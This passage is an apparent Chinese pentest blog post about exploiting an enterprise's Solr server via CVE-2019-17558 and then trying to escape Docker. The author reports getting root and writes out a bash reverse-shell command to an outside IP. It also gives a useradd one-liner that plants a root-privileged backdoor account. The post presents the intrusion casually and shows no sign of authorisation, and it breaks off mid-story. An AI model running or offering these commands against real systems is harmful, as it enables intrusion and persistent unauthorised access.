从RCE到尝试docker逃逸的曲折之路

01 前言日常日站,在测试某企业的时候扫描器突然发生反应,发现个solr,然后就有了这篇文章。02 前戏看solr的版本正好之前研究过一段时间的solr的一些rce,挨个试试在一顿操作后,啪的一下很快哈,找到一个CVE-2019-17558可以利用03 命令执行尝试使用CVE-2019-17558脚本执行命令运气爆棚直接就是root权限,我自己都不明白为啥是root,兴奋之极赶紧反弹shell呀bash -i >& /dev/tcp/xx.xx.169.148/1234 0>&1报错500,当时我就懵逼了看了看自己的vps,发现啥反应都没有,估计是poc不支持,换了好几个都没用,咋办呀很快哈,看一下ssh开了没,开了的话直接创个用户直接连上去不就行了开了,开搞,一句话创建用户设置密码并给root权限useradd -p 0openssl passwd -1 -salt 'abc' cqrdpass-u 0 -o -g root -G root -s /bin/bash -d /usr/bin/cqrd cqrd看一下/etc/passwd但是....连接的时候我直接去世去查了一下发现是设置过ssh配置文件, ………………………………